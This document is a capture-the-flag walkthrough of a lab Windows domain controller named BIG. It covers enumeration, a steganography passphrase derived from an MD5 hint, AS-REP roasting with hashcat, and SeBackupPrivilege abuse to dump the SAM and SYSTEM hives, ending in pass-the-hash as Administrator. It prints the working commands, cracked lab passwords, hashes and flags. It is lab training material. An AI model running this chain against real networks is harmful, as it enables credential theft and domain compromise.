┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# fscan -h 192.168.212.4
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.212.4:445 open
192.168.212.4:139 open
192.168.212.4:80 open
192.168.212.4:88 open
192.168.212.4:135 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 192.168.212.4 [+] DC:BBR\BIG
[*] NetInfo
[*]192.168.212.4
[->]BIG
[->]192.168.212.4
[*] WebTitle http://192.168.212.4 code:200 len:435 title:None
Completed 5/5
[*] Scan finished, elapsed: 1.939563155s
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# nmap -sCV 192.168.212.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 16:00 CST
Nmap scan report for 192.168.212.4
Host is up (0.00026s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-05 23:00:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:AD:59:C2 (Oracle VirtualBox virtual NIC)
Service Info: Host: BIG; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-05T23:00:19
|_ start_date: 2024-12-05T22:56:51
|_clock-skew: 14h59m57s
|_nbstat: NetBIOS name: BIG, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ad:59:c2 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.95 seconds
Add the domain names to /etc/hosts (the LDAP banner gives the domain bbr.thl and the host name is BIG):
192.168.212.4 bbr.thl big.bbr.thl
The website:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# curl http://192.168.212.4
<!DOCTYPE html>
<html>
<head>
<style>
/* It was all a dream */
body {
background-image: url('big1.jpg');
background-size: cover;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
</style>
</head>
<body>
<h1>Music</h1>
<p>I keep it music music, I eat that lunch (Yeah)</p>
</body>
</html>
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# smbmap -u anonymous -H 192.168.212.4
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
No SMB null session: anonymous gets no session at all.
Try user enumeration with kerbrute:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# kerbrute userenum -d BBR.BIG.THL --dc 192.168.212.4 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/05/24 - Ronnie Flathers @ropnop
2024/12/05 16:34:26 > Using KDC(s):
2024/12/05 16:34:26 > 192.168.212.4:88
2024/12/05 16:34:26 > [!] info@BBR.BIG.THL - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2024/12/05 16:34:26 > [!] 2000@BBR.BIG.THL - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2024/12/05 16:34:26 > [!] john@BBR.BIG.THL - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2024/12/05 16:34:26 > Done! Tested 20 usernames (0 valid) in 0.002 seconds
That does not work either, and the writeup moves on to the website. Note what the error actually says, though: "Wrong Realm" means the realm passed with -d (BBR.BIG.THL) is not the KDC's realm, not that enumeration is blocked. nmap reported the domain as bbr.thl, so -d bbr.thl is the value kerbrute needs; kerbrute's own hint, "Try adjusting the domain", points the same way.
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,bak,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,bak,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 151] [--> http://192.168.212.4/images/]
/contents (Status: 301) [Size: 153] [--> http://192.168.212.4/contents/]
/songs (Status: 301) [Size: 150] [--> http://192.168.212.4/songs/]
Three directories turn up. Start with contents and brute-force inside that directory:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4/contents -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,php,html,png,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4/contents
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: jpg,php,html,png,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/notify.txt (Status: 200) [Size: 112]
This yields a text file:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# curl http://192.168.212.4/contents//notify.txt
Who the hell did you hire to create the website!
Hiding keys in MD5 again!
I'm going to fire that guy
music
So a key has been hidden somewhere on the site as an MD5 hash, and the last line gives us a username: music.
Next, brute-force the songs directory for files:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4/songs -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4/songs
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/juicy.txt (Status: 200) [Size: 3350]
Progress: 415286 / 415288 (100.00%)
===============================================================
Finished
===============================================================
juicy.txt is just song lyrics; nothing useful there. Check the remaining directory:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# gobuster dir -u http://192.168.212.4/images -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x jpg,png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.212.4/images
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: png,jpg
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/big4.jpg (Status: 200) [Size: 196567]
Progress: 622929 / 622932 (100.00%)
===============================================================
Finished
===============================================================
There is an image called big4.jpg, and the homepage CSS references big1.jpg, so big2, big3 and possibly more probably exist even though the wordlist only matched big4. Fetch them by name: testing shows there are four images in total, big1.jpg to big4.jpg.
What a handsome guy.
Something must be hidden in these images, so check each one for embedded data:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# stegseek --seed big2.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found (possible) seed: "c2726679"
Plain size: 43.0 Byte(s) (compressed)
Encryption Algorithm: rijndael-128
Encryption Mode: cbc
Of the four, only big2.jpg carries a steghide payload, and extracting it needs a passphrase. notify.txt said the key was hidden "in MD5", and the page source contained the out-of-place CSS comment "It was all a dream". So take the MD5 of that phrase and use the hex digest as the passphrase. Hash it with echo -n (or printf) so the trailing newline is not included; otherwise the digest is different and steghide rejects it:
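Added example, not from the writeup: a small POSIX shell helper that turns a hint phrase into passphrase candidates (the phrase itself, its MD5 with and without the trailing newline, and a lower-case variant) and tries each one against the image with steghide. It assumes steghide and md5sum are on the PATH; the variants beyond the plain MD5 are my additions, the MD5-without-newline case is exactly what the writeup computes by hand.

```shell
#!/bin/sh
# Added example (not from the original writeup): derive steghide passphrase
# candidates from a hint phrase and try them. Assumes steghide and md5sum.

# MD5 hex digest of a string with no trailing newline (what 'echo -n' hashes).
md5_nonl() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# MD5 of the string *with* a trailing newline: what a plain 'echo' would hash.
# Included so the two digests can be compared; this is the usual mistake.
md5_nl() {
    printf '%s\n' "$1" | md5sum | cut -d' ' -f1
}

# Candidate passphrases from one hint phrase, one per line:
# the phrase, its MD5 (the notify.txt hint), the newline-tainted MD5,
# the lower-cased phrase and its MD5.
candidates() {
    phrase=$1
    lower=$(printf '%s' "$phrase" | tr 'A-Z' 'a-z')
    printf '%s\n' "$phrase" "$(md5_nonl "$phrase")" "$(md5_nl "$phrase")" \
        "$lower" "$(md5_nonl "$lower")"
}

# Try every candidate against a JPEG. Prints the working passphrase and
# returns 0; returns 1 if none worked, 2 if steghide is not installed.
try_extract() {
    image=$1
    phrase=$2
    command -v steghide >/dev/null 2>&1 || { echo "steghide not installed" >&2; return 2; }
    found=$(candidates "$phrase" | while IFS= read -r pw; do
        # -p passes the passphrase, -f overwrites an earlier extracted file
        if steghide extract -sf "$image" -p "$pw" -f >/dev/null 2>&1; then
            printf '%s' "$pw"
            break
        fi
    done)
    if [ -n "$found" ]; then
        echo "$found"
        return 0
    fi
    return 1
}

# Usage: sh stegtry.sh big2.jpg 'It was all a dream'
if [ "$#" -ge 2 ]; then
    try_extract "$1" "$2"
fi
```

The extracted file lands in the current directory under the name stored in the image (frase.txt in this box). Keep the hint phrase exactly as it appears in the page source; steghide passphrases are case-sensitive and so is the MD5 input.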
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# echo -n 'It was all a dream' |md5sum
99ae77c0c0faf78b872f9f452e3eaa24 -
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# steghide extract -sf big2.jpg
Enter passphrase: 99ae77c0c0faf78b872f9f452e3eaa24
wrote extracted data to "frase.txt".
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# cat frase.txt
Bigpoppa1972
That string is presumably a password. Log in over WinRM (evil-winrm) as music with Bigpoppa1972 and first check whether the account holds any privilege worth abusing:
*Evil-WinRM* PS C:\Users\TEMP\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Nothing directly exploitable. Collect domain information for BloodHound via netexec:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# netexec ldap 192.168.212.4 -u 'music' -p 'Bigpoppa1972' --bloodhound --collection All --dns-server 192.168.212.4
SMB 192.168.212.4 445 BIG [*] Windows 10 / Server 2016 Build 14393 x64 (name:BIG) (domain:bbr.thl) (signing:True) (SMBv1:False)
LDAP 192.168.212.4 389 BIG [+] bbr.thl\music:Bigpoppa1972
LDAP 192.168.212.4 389 BIG Resolved collection methods: group, acl, dcom, session, rdp, psremote, container, trusts, objectprops, localadmin
LDAP 192.168.212.4 389 BIG Done in 00M 00S
LDAP 192.168.212.4 389 BIG Compressing output into /root/.nxc/logs/BIG_192.168.212.4_2024-12-06_083621_bloodhound.zip
Import the zip into BloodHound for analysis. It shows that the user song has Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl), which makes the account AS-REP roastable.
Normally a client must prove knowledge of the password up front by sending a timestamp encrypted with its key. When pre-authentication is not required, the KDC answers an unauthenticated AS-REQ for that user with an AS-REP whose encrypted part is sealed with a key derived from the user's password, so anyone on the network can request that AS-REP and crack the password offline against it.
So we can run an AS-REP roasting attack.
Before the attack, sync the clock with the DC: nmap reported a clock skew of about 15 hours, and Kerberos rejects requests outside its tolerance (5 minutes by default):
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# rdate -n 192.168.212.4
Fri Dec 6 08:47:54 CST 2024
Request the AS-REP. GetNPUsers is given a dummy password here; because the account does not require pre-authentication the KDC hands back the AS-REP regardless, which is what the "Cannot authenticate song, getting its TGT" line means (-no-pass does the same without a fake password):
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# impacket-GetNPUsers bbr.thl/song:123
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Cannot authenticate song, getting its TGT
$krb5asrep$23$song@BBR.THL:7778a3e5b83d24074528729cd8e104cf$ce7dbe4474a7db21b21809a7af5f3416786079bc76f6f780dbea54769b28b03d04ca645a378eeddce0bee8615211f36cfeba66c4bf4c3b7c4adcc74b474482a977105c2d8571ff3b2393b5a61e1292c8ffa7b801ce0d76f1ae4d540ccabd7430f1f67175812a94ca527b707fc07644e6f22d2cba60f0f6e280b4f0f7dc28817df23202d8b9b81ca5d9a0ad02dcbed0a7d87b797236a902051c44a83ebe97f603b741754f36b1cbed5d9dd71d3cd82017db227d6a8004af1bf4007877cdcc2e7af7c83e60304973c0dcb5fbb98cebbe59334307b935065b1a4abbba83b5bb82cdb409
hashcat with rockyou does not crack it. Maybe enumeration was incomplete; with the music session we can look at the web root on the box directly:
*Evil-WinRM* PS C:\inetpub\wwwroot\songs> dir
Directory: C:\inetpub\wwwroot\songs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/2/2024 4:54 AM 3535 BigPoppa.txt
-a---- 5/2/2024 4:54 AM 4280 Hypnotize.txt
-a---- 5/2/2024 4:54 AM 3350 Juicy.txt
-a---- 5/2/2024 4:54 AM 1793 Skyisthelimit.txt
-a---- 5/3/2024 2:06 PM 168 web.config
The songs directory holds far more than gobuster found (the wordlist only matched Juicy.txt). Download them all. Skyisthelimit.txt turns out to be a password list:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# cat Skyisthelimit.txt
123456
admin
12345678
123456789
1234
12345
password
123
Aa123456
1234567890
UNKNOWN
1234567
...
Crack the AS-REP with that list (mode 18200 is Kerberos 5 etype 23 AS-REP):
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# hashcat -a 0 -m 18200 as-rep.txt Skyisthelimit.txt
hashcat (v6.2.6) starting
$krb5asrep$23$song@BBR.THL:7778a3e5b83d24074528729cd8e104cf$ce7dbe4474a7db21b21809a7af5f3416786079bc76f6f780dbea54769b28b03d04ca645a378eeddce0bee8615211f36cfeba66c4bf4c3b7c4adcc74b474482a977105c2d8571ff3b2393b5a61e1292c8ffa7b801ce0d76f1ae4d540ccabd7430f1f67175812a94ca527b707fc07644e6f22d2cba60f0f6e280b4f0f7dc28817df23202d8b9b81ca5d9a0ad02dcbed0a7d87b797236a902051c44a83ebe97f603b741754f36b1cbed5d9dd71d3cd82017db227d6a8004af1bf4007877cdcc2e7af7c83e60304973c0dcb5fbb98cebbe59334307b935065b1a4abbba83b5bb82cdb409:Passwordsave@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$song@BBR.THL:7778a3e5b83d24074528729c...cdb409
Time.Started.....: Fri Dec 6 11:30:12 2024 (0 secs)
Time.Estimated...: Fri Dec 6 11:30:12 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (Skyisthelimit.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 429.8 kH/s (0.07ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 201/201 (100.00%)
Rejected.........: 0/201 (0.00%)
Restore.Point....: 0/201 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> qwerty123456
Hardware.Mon.#1..: Util: 13%
song's password is Passwordsave@.
Log in with that account and check song's privileges:
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeBackupPrivilege (back up files and directories) is present, together with SeRestorePrivilege. With backup privilege a process can read any file or registry hive regardless of its ACL, so we can dump the SAM and LSA secrets (author's notes: ../../24-渗透姿势库/4-横向移动/1-Credentials/SAM & LSA secrets).
In song's WinRM session, pick a directory we can download from and save the SAM and SYSTEM hives; reg save needs exactly this privilege:
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> reg save hklm\sam sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> reg save hklm\system system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> dir
Directory: C:\Users\TEMP.bbr\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/5/2024 9:05 PM 36864 sam.hive
-a---- 12/5/2024 9:05 PM 9945088 system.hive
Then download them to Kali:
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> download sam.hive
Info: Downloading C:\Users\TEMP.bbr\Documents\sam.hive to sam.hive
Info: Download successful!
*Evil-WinRM* PS C:\Users\TEMP.bbr\Documents> download system.hive
Info: Downloading C:\Users\TEMP.bbr\Documents\system.hive to system.hive
Info: Download successful!
Use impacket-secretsdump to extract the NTLM hashes from the saved hives:
┌──(root㉿kali)-[/home/kali/thl/BIG]
└─# impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0xbb33617256ea48219d9d3d01766b7a9e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb1c50a48c37e053d2045cd5b55cd2f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
That gives an Administrator hash; pass-the-hash over WinRM to log in:
evil-winrm -i 192.168.212.4 -u administrator -H 5d48bcf84aea999fb1ade06970a81237
*Evil-WinRM* PS C:\users\music\documents> type user.txt
53bdf70c03ad626fe7a17ba5a9495b3a
*Evil-WinRM* PS C:\Users\Administrator\documents> type root.txt
8e824f6e933f0b62616aa54d75416184
Something does not add up here. The hash we extracted is
bb1c50a48c37e053d2045cd5b55cd2f2
but it does not log in; the hash that works is 5d48bcf84aea999fb1ade06970a81237. I checked a walkthrough: 5d48bcf84aea999fb1ade06970a81237 comes from that walkthrough, while the official walkthrough logs in with bb1c50a48c37e053d2045cd5b55cd2f2. My guess was that the account had been changed.
The likely explanation is what BIG is: a domain controller. On a DC the SAM hive still exists, but it only holds the local accounts (which is why secretsdump listed just Administrator, Guest and DefaultAccount), and its RID 500 Administrator is the Directory Services Restore Mode (DSRM) account, not the domain Administrator. Domain accounts, Administrator included, live in NTDS.dit. So bb1c50a48c37e053d2045cd5b55cd2f2 is the DSRM password hash; DSRM credentials are not accepted for network logon unless DsrmAdminLogonBehavior is set to 2, so pass-the-hash against the domain Administrator with it fails. 5d48bcf84aea999fb1ade06970a81237 is the domain Administrator's NT hash, which the same SeBackupPrivilege can recover from NTDS.dit. If the official walkthrough logged in with the SAM hash, the DSRM and domain Administrator passwords were simply the same on that build of the box.